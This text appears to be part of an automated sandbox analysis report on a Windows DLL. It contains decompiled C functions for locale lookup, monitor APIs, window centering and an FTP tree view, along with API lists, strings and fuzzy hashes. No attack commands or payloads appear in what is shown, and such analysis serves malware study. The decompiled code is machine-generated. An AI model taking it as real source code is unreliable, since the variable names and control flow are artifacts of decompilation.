					 *(_t130 - 0x120) = _t87;
					_t88 = _t87 & 0x0000ffff;
					_t123 = 0x3ff;
					_t118 = _t88 & 0x3ff;
					 *(_t130 - 0x11c) = _t118;
					 *((intOrPtr*)(_t130 - 0x148)) = ConvertDefaultLocale(_t88 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t118);
					 *((intOrPtr*)(_t130 - 0x144)) = ConvertDefaultLocale( *(_t130 - 0x11c));
					 *(_t130 - 0x11c) = 2;
					_t95 = GetProcAddress( *(_t130 - 0x134), "GetSystemDefaultUILanguage");
					if(_t95 != 0) {
						_t97 =  *_t95() & 0x0000ffff;
						 *(_t130 - 0x120) = _t97;
						_t98 = _t97 & 0x0000ffff;
						_t123 = _t98 & 0x3ff;
						 *((intOrPtr*)(_t130 - 0x140)) = ConvertDefaultLocale(_t98 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t123);
						 *((intOrPtr*)(_t130 - 0x13c)) = ConvertDefaultLocale(_t123);
						 *(_t130 - 0x11c) = 4;
					}
				}
				 *(_t130 - 0x11c) =  &(1[ *(_t130 - 0x11c)]);
				 *((intOrPtr*)(_t130 +  *(_t130 - 0x11c) * 4 - 0x148)) = 0x800;
				_t126 = 0x10000000;
				 *((char*)(_t130 - 0x13)) = 0;
				 *((char*)(_t130 - 0x14)) = 0;
				if(GetModuleFileNameA(0x10000000, _t130 - 0x118, 0x105) != 0) {
					_t123 = 0x20;
					_t106 = 0;
					E10013A90(_t123, _t130 - 0x168, 0, _t123);
					 *(_t130 - 0x168) = _t123;
					 *((intOrPtr*)(_t130 - 0x160)) = _t130 - 0x118;
					 *((intOrPtr*)(_t130 - 0x154)) = 0x3e8;
					 *(_t130 - 0x14c) = 0x10000000;
					 *((intOrPtr*)(_t130 - 0x164)) = 0x88;
					E1000DB3D(_t130 - 0x12c, 0xffffffff);
					 *(_t130 - 4) = 0;
					if(E1000DBF4(_t130 - 0x12c, _t130 - 0x168) != 0) {
						E1000DC2E(_t130 - 0x12c);
					}
					_t127 = 0;
					if( *(_t130 - 0x11c) <= _t106) {
						L13:
						_t126 = 0;
						goto L15;
					} else {
						while(1) {
							_t76 = E1000DFEB( *((intOrPtr*)(_t130 - 0x124)),  *((intOrPtr*)(_t130 - 0x130)), _t123,  *((intOrPtr*)(_t130 + _t127 * 4 - 0x148)));
							if(_t76 != _t106) {
								_t126 = _t76;
								break;
							}
							_t127 =  &(1[_t127]);
							if(_t127 <  *(_t130 - 0x11c)) {
								continue;
							}
							goto L13;
						}
						L15:
						 *(_t130 - 4) =  *(_t130 - 4) | 0xffffffff;
						E1000E0BD(_t130 - 0x12c);
						goto L7;
					}
				}
				L7:
				return E10013A64(_t106, _t123, _t126);
			}

0x1000e207
0x1000e211
0x1000e21f
0x1000e228
0x1000e22f
0x1000e235
0x1000e23b
0x1000e241
0x1000e243
0x1000e24f
0x1000e255
0x1000e259
0x1000e309
0x1000e30d
0x1000e320
0x1000e326
0x1000e333
0x1000e335
0x1000e350
0x1000e35c
0x1000e364
0x1000e36a
0x1000e36a
0x1000e333
0x1000e25f
0x1000e267
0x1000e26a
0x1000e270
0x1000e278
0x1000e282
0x1000e28b
0x1000e299
0x1000e2ac
0x1000e2b2
0x1000e2bc
0x1000e2c0
0x1000e2c8
0x1000e2cb
0x1000e2d1
0x1000e2de
0x1000e2ea
0x1000e2f2
0x1000e2f8
0x1000e2f8
0x1000e2c0
0x1000e37a
0x1000e380
0x1000e397
0x1000e39d
0x1000e3a1
0x1000e3ad
0x1000e3b9
0x1000e3bb
0x1000e3c5
0x1000e3db
0x1000e3e1
0x1000e3e7
0x1000e3f1
0x1000e3f7
0x1000e401
0x1000e413
0x1000e41d
0x1000e425
0x1000e425
0x1000e42a
0x1000e432
0x1000e45a
0x1000e45a
0x00000000
0x1000e434
0x1000e434
0x1000e447
0x1000e44f
0x1000e45e
0x1000e45e
0x1000e45e
0x1000e451
0x1000e458
0x00000000
0x00000000
0x00000000
0x1000e458
0x1000e460
0x1000e460
0x1000e46a
0x00000000
0x1000e46f
0x1000e432
0x1000e3af
0x1000e3b4

APIs

__EH_prolog3_GS.LIBCMT ref: 1000E211
GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1000E4D8,?,?), ref: 1000E241
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000E255
ConvertDefaultLocale.KERNEL32(?), ref: 1000E291
ConvertDefaultLocale.KERNEL32(?), ref: 1000E29F
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000E2BC
ConvertDefaultLocale.KERNEL32(?), ref: 1000E2E7
ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000E2F0
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 1000E309
EnumResourceLanguagesA.KERNEL32 ref: 1000E326
ConvertDefaultLocale.KERNEL32(?), ref: 1000E359
ConvertDefaultLocale.KERNEL32(00000000), ref: 1000E362
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000E3A5
_memset.LIBCMT ref: 1000E3C5

Strings

ntdll.dll, xrefs: 1000E304
GetUserDefaultUILanguage, xrefs: 1000E249
kernel32.dll, xrefs: 1000E22A
GetSystemDefaultUILanguage, xrefs: 1000E2A1

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 3537336938-2299501126
Opcode ID: 17cddf3a5cc7a850aa9c172bd347de9df3db8f871255b89ea02ec63c74865636
Instruction ID: dcaba6538c033776f25991243f416baec269dc66f7c1cdbdb6f62256c1977f32
Opcode Fuzzy Hash: 17cddf3a5cc7a850aa9c172bd347de9df3db8f871255b89ea02ec63c74865636
Instruction Fuzzy Hash: FC511975D002689BDB64DF658C457EDBAF4EB48340F1042EAE988E3291D7749F81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 10006FE3, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E10006FE3() {
				void* __ebx;
				void* __esi;
				void* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				signed int _t16;
				signed int _t17;
				struct HINSTANCE__* _t19;
				void* _t21;
				void* _t24;
				void* _t25;

				_t17 = _t16 ^ _t16;
				_t24 =  *0x1005821c - _t17; // 0x0
				if(_t24 == 0) {
					_push(_t21);
					 *0x10058220 = E10006F89(_t17, _t21, __eflags);
					_t19 = GetModuleHandleA("USER32");
					__eflags = _t19 - _t17;
					if(_t19 == _t17) {
						L12:
						 *0x10058200 = _t17;
						 *0x10058204 = _t17;
						 *0x10058208 = _t17;
						 *0x1005820c = _t17;
						 *0x10058210 = _t17;
						 *0x10058214 = _t17;
						 *0x10058218 = _t17;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t19, "GetSystemMetrics");
						 *0x10058200 = _t6;
						__eflags = _t6 - _t17;
						if(_t6 == _t17) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t19, "MonitorFromWindow");
							 *0x10058204 = _t7;
							__eflags = _t7 - _t17;
							if(_t7 == _t17) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t19, "MonitorFromRect");
								 *0x10058208 = _t8;
								__eflags = _t8 - _t17;
								if(_t8 == _t17) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t19, "MonitorFromPoint");
									 *0x1005820c = _t9;
									__eflags = _t9 - _t17;
									if(_t9 == _t17) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t19, "EnumDisplayMonitors");
										 *0x10058214 = _t10;
										__eflags = _t10 - _t17;
										if(_t10 == _t17) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t19, "GetMonitorInfoA");
											 *0x10058210 = _t11;
											__eflags = _t11 - _t17;
											if(_t11 == _t17) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t19, "EnumDisplayDevicesA");
												 *0x10058218 = _t12;
												__eflags = _t12 - _t17;
												if(_t12 == _t17) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x1005821c = 1;
					return _t5;
				} else {
					_t25 =  *0x10058210 - _t17; // 0x0
					return 0 | _t25 != 0x00000000;
				}
			}

0x10006fe6
0x10006fe8
0x10006fee
0x10006ffd
0x10007009
0x10007014
0x10007016
0x10007018
0x100070ac
0x100070ac
0x100070b2
0x100070b8
0x100070be
0x100070c4
0x100070ca
0x100070d0
0x100070d6
0x1000701e
0x1000702a
0x1000702c
0x10007031
0x10007033
0x00000000
0x10007035
0x1000703b
0x1000703d
0x10007042
0x10007044
0x00000000
0x10007046
0x1000704c
0x1000704e
0x10007053
0x10007055
0x00000000
0x10007057
0x1000705d
0x1000705f
0x10007064
0x10007066
0x00000000
0x10007068
0x1000706e
0x10007070
0x10007075
0x10007077
0x00000000
0x10007079
0x1000707f
0x10007081
0x10007086
0x10007088
0x00000000
0x1000708a
0x10007090
0x10007092
0x10007097
0x10007099
0x00000000
0x1000709b
0x1000709d
0x1000709d
0x1000709d
0x10007099
0x10007088
0x10007077
0x10007066
0x10007055
0x10007044
0x10007033
0x100070a0
0x100070ab
0x10006ff0
0x10006ff2
0x10006ffc
0x10006ffc

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,770D5D80,10007138,?,?,?,?,?,?,?,1000902B,00000000,00000002,00000028), ref: 1000700E
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 1000702A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 1000703B
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000704C
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000705D
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000706E
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000707F
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10007090

Strings

EnumDisplayDevicesA, xrefs: 1000708A
GetMonitorInfoA, xrefs: 10007079
EnumDisplayMonitors, xrefs: 10007068
MonitorFromWindow, xrefs: 10007035
GetSystemMetrics, xrefs: 10007024
MonitorFromRect, xrefs: 10007046
USER32, xrefs: 10007004
MonitorFromPoint, xrefs: 10007057

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: c8e4208982977d121417441ac4c56860c65a37bd29ff4aa3a929250a7938bf29
Instruction ID: 63bb846d9f00d7d50e9688c6beaea88fcc9352e82e50c8aa71922069abd4c971
Opcode Fuzzy Hash: c8e4208982977d121417441ac4c56860c65a37bd29ff4aa3a929250a7938bf29
Instruction Fuzzy Hash: C6212C72911631EEF750EF749CC846B3EE9F74C280B62497EE619E2120D7784A458BA2

Uniqueness

Uniqueness Score: -1.00%

Function 10001279, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 331
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E10001279(int __ecx, void* __edx, void* __edi, void* __eflags, signed int* _a4) {
				int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v32;
				char _v36;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				void* _v64;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v100;
				int _v104;
				char* _v112;
				signed int _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				void* _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				signed int _v156;
				char _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				char _v173;
				char _v176;
				char _v184;
				char _v185;
				char _v196;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t143;
				signed int _t159;
				void* _t163;
				signed int _t170;
				char _t174;
				void* _t179;
				long _t184;
				signed int _t186;
				long _t190;
				intOrPtr _t191;
				intOrPtr* _t197;
				signed int _t198;
				intOrPtr* _t201;
				signed int _t202;
				signed int _t203;
				void* _t205;
				void* _t213;
				int _t225;
				char* _t226;
				void* _t274;
				void* _t275;
				void* _t280;
				signed int _t281;

				_t275 = __edi;
				_t274 = __edx;
				_push(0xffffffff);
				_push(E10026055);
				_push( *[fs:0x0]);
				_t143 =  *0x10031c30; // 0x1f496801
				_push(_t143 ^ (_t281 & 0xfffffff8) - 0x0000009c);
				 *[fs:0x0] =  &_v16;
				_t225 = __ecx;
				_v160 = 0;
				E100045E3( *((intOrPtr*)(E10006DEC(__ecx, __edi, 0, __eflags) + 4)));
				_v8 = 0;
				_t278 = SendMessageA;
				SendMessageA( *(__edi + 0x20), 0x1101, 0, 0xffff0000);
				if(_t225 != 0) {
					 *(__edi + 0x54) = _t225;
					_t226 = "/";
					_push(_t226);
					E10001C4E(_t226,  &_v156, __edi, SendMessageA, __eflags);
					_v12 = 1;
					_v128 = _v128 & 0x00000000;
					_v96 = 1;
					_v92 = 1;
					_v104 = _t226;
					_v124 = 0xffff0002;
					_v120 = 0x23;
					_v128 = SendMessageA( *(__edi + 0x20), 0x1100, 0,  &_v128);
					SendMessageA( *(__edi + 0x20), 0x1100, 0,  &_v128);
					_t225 = 0x110a;
					SendMessageA( *(__edi + 0x20), 0x1102, 2, SendMessageA( *(__edi + 0x20), 0x1100, 0, 0));
					_t159 = E10003BF2(__edi, SendMessageA( *(__edi + 0x20), 0x1100, 0, 0));
					_push(0);
					__eflags = _t159;
					if(_t159 != 0) {
						_push(4);
						_push(0);
						E1000C358(__edi);
						__eflags =  *_a4;
						if( *_a4 == 0) {
							L37:
							__eflags = _v160 + 0xfffffff0;
							E100010A3(_v160 + 0xfffffff0, _t274);
							goto L38;
						}
						E10001F42( &_v152, E1000517E());
						_v16 = 2;
						E10001F67( &_v176, __eflags, _a4);
						_v20 = 3;
						_v176 = SendMessageA( *(__edi + 0x20), 0x1100, 0, 0);
						while(1) {
							L35:
							__eflags =  *(_v172 - 0xc);
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t170 = E10012AC3(_v172, "/");
								__eflags = _t170;
								if(_t170 == 0) {
									goto L7;
								}
								_t203 = _t170 - _v172;
								__eflags = _t203;
								_v156 = _t203;
								if(_t203 >= 0) {
									__eflags = _v156;
									if(_v156 > 0) {
										_t205 = E10001CFC( &_v172,  &_v144, _v156);
										_v20 = 4;
										E10001F8F( &_v168, _t205);
										_v24 = 3;
										E100010A3(_v156 + 0xfffffff0, _t274);
										_t213 = E10001CB6( &_v184,  &_v144,  *((intOrPtr*)(_v184 - 0xc)) - _v168 - 1);
										_v32 = 5;
										E10001F8F( &_v172, _t213);
										_v36 = 3;
										__eflags = _v156 + 0xfffffff0;
										E100010A3(_v156 + 0xfffffff0, _t274);
										E10001F8F( &_v196,  &_v176);
									}
									L13:
									_t174 = _v160;
									__eflags =  *(_t174 - 0xc);
									if( *(_t174 - 0xc) == 0) {
										L34:
										_t179 = E10001CB6( &_v172,  &_v140,  *(_v172 - 0xc) - 1);
										_v20 = 8;
										E10001F8F( &_v160, _t179);
										_v24 = 3;
										__eflags = _v152 + 0xfffffff0;
										E100010A3(_v152 + 0xfffffff0, _t274);
										E10001F8F( &_v184,  &_v164);
										continue;
									}
									__eflags = _v156;
									if(_v156 == 0) {
										goto L34;
									}
									_push(_v168);
									_push(4);
									while(1) {
										_t184 = SendMessageA( *(_t275 + 0x20), _t225, ??, ??);
										_v168 = _t184;
										__eflags = _t184;
										if(__eflags == 0) {
											goto L18;
										}
										L17:
										_push(_t184);
										_push( &_v136);
										_t201 = E100040A3(_t225, _t275, _t275, _t278, __eflags);
										_v20 = 6;
										_v172 = _v172 | 0x00000001;
										_t202 = E10001EA7( &_v168, _t278, _t280,  *_t201);
										_v185 = 1;
										__eflags = _t202;
										if(_t202 != 0) {
											L19:
											_v12 = 3;
											__eflags = _v164 & 0x00000001;
											if((_v164 & 0x00000001) != 0) {
												_v164 = _v164 & 0xfffffffe;
												__eflags = _v136 + 0xfffffff0;
												E100010A3(_v136 + 0xfffffff0, _t274);
											}
											__eflags = _v173;
											if(_v173 == 0) {
												__eflags = _v168;
												if(__eflags == 0) {
													L25:
													_v173 = 0;
													L26:
													_v12 = 3;
													__eflags = _v164 & 0x00000002;
													if((_v164 & 0x00000002) != 0) {
														_v164 = _v164 & 0xfffffffd;
														__eflags = _v148 + 0xfffffff0;
														E100010A3(_v148 + 0xfffffff0, _t274);
													}
													__eflags = _v173;
													if(_v173 == 0) {
														L33:
														E10001E15( &_v172);
													} else {
														_t186 = E10003BF2(_t275, _v168);
														_push(_v172);
														__eflags = _t186;
														if(_t186 == 0) {
															SendMessageA( *(_t275 + 0x20), 0x110b, 9, ??);
															_v60 = _v168;
															_v64 = 0x18;
															_v52 = 0x10;
															_t190 = SendMessageA( *(_t275 + 0x20), 0x110c, 0,  &_v64);
															__eflags = _t190;
															if(_t190 != 0) {
																_t191 = 0x10;
																_v52 = _t191;
																_v56 = _t191;
																_v64 = 0x18;
																SendMessageA( *(_t275 + 0x20), 0x110d, 0,  &_v64);
															}
															goto L33;
														}
														SendMessageA( *(_t275 + 0x20), 0x1102, 2, ??);
													}
													goto L35;
												}
												_push(_v168);
												_push( &_v148);
												_t197 = E100040A3(_t225, _t275, _t275, _t278, __eflags);
												_v20 = 7;
												_v172 = _v172 | 0x00000002;
												_t198 = E10001EA7( &_v168, _t278, _t280,  *_t197);
												_v185 = 1;
												__eflags = _t198;
												if(_t198 == 0) {
													goto L26;
												}
												goto L25;
											} else {
												_push(_v168);
												_push(1);
												_t184 = SendMessageA( *(_t275 + 0x20), _t225, ??, ??);
												_v168 = _t184;
												__eflags = _t184;
												if(__eflags == 0) {
													goto L18;
												}
												goto L17;
											}
										}
										L18:
										_v173 = 0;
										goto L19;
									}
								}
								L10:
								E10001F8F( &_v160,  &_v172);
								E10001E15( &_v176);
								goto L13;
							}
							L7:
							_v156 = _v156 | 0xffffffff;
							goto L10;
						}
						E100010A3(_v172 + 0xfffffff0, _t274);
						__eflags = _v152 + 0xfffffff0;
						E100010A3(_v152 + 0xfffffff0, _t274);
						goto L37;
					}
					_push(_t159);
					_push(4);
					E1000C358(__edi);
					goto L37;
				} else {
					E1000C358(__edi, 4, _t225, _t225);
					_v136 = _t225;
					_v132 = 0xffff0001;
					_v104 = _t225;
					_v100 = _t225;
					_v112 = "An FTP connection has not been established.";
					_v128 = 0x23;
					SendMessageA( *(__edi + 0x20), 0x1100, _t225,  &_v136);
					 *(__edi + 0x54) = _t225;
					L38:
					_v12 = _v12 | 0xffffffff;
					_t163 = E100010F6(_t225,  &_v173, _t274, _t275, _t278, _v12);
					 *[fs:0x0] = _v20;
					return _t163;
				}
			}

0x10001279
0x10001279
0x1000127f
0x10001281
0x1000128c
0x10001295
0x1000129c
0x100012a4
0x100012aa
0x100012ae
0x100012ba
0x100012c5
0x100012cc
0x100012da
0x100012de
0x10001327
0x1000132a
0x1000132f
0x10001334
0x10001339
0x10001341
0x10001349
0x1000134d
0x10001356
0x10001365
0x1000136d
0x10001377
0x10001386
0x1000138c
0x100013a0
0x100013af
0x100013b4
0x100013b8
0x100013ba
0x100013c9
0x100013cb
0x100013cd
0x100013d5
0x100013d8
0x100016fe
0x10001702
0x10001705
0x00000000
0x10001705
0x100013e8
0x100013f4
0x100013fc
0x10001406
0x10001413
0x100016d7
0x100016d7
0x100016de
0x100016e0
0x00000000
0x00000000
0x1000141c
0x1000142e
0x10001435
0x10001437
0x00000000
0x00000000
0x10001439
0x10001439
0x1000143d
0x10001441
0x1000145f
0x10001464
0x10001477
0x10001481
0x10001489
0x1000148e
0x1000149d
0x100014b8
0x100014c2
0x100014ca
0x100014cf
0x100014db
0x100014de
0x100014ec
0x100014ec
0x100014f1
0x100014f1
0x100014f5
0x100014f9
0x1000168c
0x1000169e
0x100016a8
0x100016b0
0x100016b5
0x100016c1
0x100016c4
0x100016d2
0x00000000
0x100016d2
0x100014ff
0x10001504
0x00000000
0x00000000
0x1000150a
0x1000150e
0x10001510
0x10001514
0x10001516
0x1000151a
0x1000151c
0x00000000
0x00000000
0x1000151e
0x1000151e
0x10001523
0x10001526
0x1000152b
0x10001535
0x1000153e
0x10001543
0x10001548
0x1000154a
0x10001551
0x10001551
0x1000155c
0x10001561
0x10001567
0x1000156c
0x1000156f
0x1000156f
0x10001574
0x10001579
0x10001583
0x10001588
0x100015bb
0x100015bb
0x100015c0
0x100015c0
0x100015cb
0x100015d0
0x100015d6
0x100015db
0x100015de
0x100015de
0x100015e3
0x100015e8
0x10001681
0x10001685
0x100015ee
0x100015f4
0x100015f9
0x100015fd
0x100015ff
0x1000161c
0x10001622
0x10001638
0x10001643
0x1000164e
0x10001650
0x10001652
0x10001656
0x10001657
0x1000165e
0x10001674
0x1000167f
0x1000167f
0x00000000
0x10001652
0x1000160b
0x1000160b
0x00000000
0x100015e8
0x1000158a
0x10001592
0x10001595
0x1000159a
0x100015a4
0x100015ad
0x100015b2
0x100015b7
0x100015b9
0x00000000
0x00000000
0x00000000
0x1000157b
0x1000157b
0x1000157f
0x10001514
0x10001516
0x1000151a
0x1000151c
0x00000000
0x00000000
0x00000000
0x1000151c
0x10001579
0x1000154c
0x1000154c
0x00000000
0x1000154c
0x10001510
0x10001443
0x1000144c
0x10001455
0x00000000
0x10001455
0x1000141e
0x1000141e
0x00000000
0x1000141e
0x100016ed
0x100016f6
0x100016f9
0x00000000
0x100016f9
0x100013bc
0x100013bd
0x100013bf
0x00000000
0x100012e0
0x100012e6
0x100012f9
0x100012fd
0x10001305
0x10001309
0x1000130d
0x10001315
0x1000131d
0x1000131f
0x1000170a
0x1000170a
0x10001716
0x10001722
0x1000172f
0x1000172f

APIs

SendMessageA.USER32 ref: 100012DA
SendMessageA.USER32 ref: 1000131D
SendMessageA.USER32 ref: 10001375
SendMessageA.USER32 ref: 10001386
SendMessageA.USER32 ref: 10001393
SendMessageA.USER32 ref: 100013A0
SendMessageA.USER32 ref: 100013AA

Strings

An FTP connection has not been established., xrefs: 1000130D
#, xrefs: 1000136D

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID: #$An FTP connection has not been established.
API String ID: 3850602802-911664957
Opcode ID: 40dd5c14b2940e8ab0c990329d826e50a1415d740050557cbec170c60ca6312f
Instruction ID: 359fb0f04d5348b3ec04c72f0881a50f439acd1966fb2aa2c9d523c55bc409a7
Opcode Fuzzy Hash: 40dd5c14b2940e8ab0c990329d826e50a1415d740050557cbec170c60ca6312f
Instruction Fuzzy Hash: BBD16971508381AFE311DF24CC41BABBBE9FF84394F004A1DB595962E5DBB1A948CB53

Uniqueness

Uniqueness Score: -1.00%

Function 10008F3B, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E10008F3B(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E1000C324(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E10007198(_t121, E1000712B(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E10005329();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E10007198(_t121, E1000712B(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t123 + _t116 > _v28.right) {
					_t116 = _t108 - _v60.right + _v28.right;
				}
				if(_t116 < _v28.left) {
					_t116 = _v28.left;
				}
				if(_a4 + _t129 > _v28.bottom) {
					_t129 = _v60.top - _v60.bottom + _v28.bottom;
				}
				if(_t129 < _v28.top) {
					_t129 = _v28.top;
				}
				return E1000C4BE(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

0x10008f3b
0x10008f3b
0x10008f44
0x10008f47
0x10008f4f
0x10008f52
0x10008f57
0x10008f65
0x10008f77
0x10008f67
0x10008f6a
0x10008f6a
0x10008f7d
0x10008f81
0x10008f8d
0x10008f95
0x10008f97
0x10008f97
0x10008f95
0x10008f59
0x10008f59
0x10008f59
0x10008f59
0x10008f99
0x10008fa7
0x10008fb0
0x10009050
0x10009057
0x1000905e
0x10009068
0x10008fb6
0x10008fb8
0x10008fbd
0x10008fc8
0x10008fd1
0x10008fd1
0x10008fc8
0x10008fd3
0x10008fdc
0x1000901d
0x1000902c
0x10009039
0x10008fde
0x10008fde
0x10008fe5
0x10008fe7
0x10008fe7
0x10008ff7
0x1000900a
0x10009014
0x10009014
0x10008fdc
0x10009077
0x1000907c
0x10009081
0x10009085
0x10009088
0x1000908f
0x10009099
0x100090a1
0x100090a9
0x100090b0
0x100090b5
0x100090bd
0x100090bd
0x100090c3
0x100090c5
0x100090c5
0x100090d0
0x100090d8
0x100090d8
0x100090de
0x100090e0
0x100090e0
0x100090f8

APIs

Part of subcall function 1000C324: GetWindowLongA.USER32 ref: 1000C32F

GetParent.USER32(?), ref: 10008F6A
SendMessageA.USER32 ref: 10008F8D
GetWindowRect.USER32 ref: 10008FA7
GetWindowLongA.USER32 ref: 10008FBD
CopyRect.USER32 ref: 1000900A
CopyRect.USER32 ref: 10009014
GetWindowRect.USER32 ref: 1000901D
CopyRect.USER32 ref: 10009039

Strings

(, xrefs: 10008FD3

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

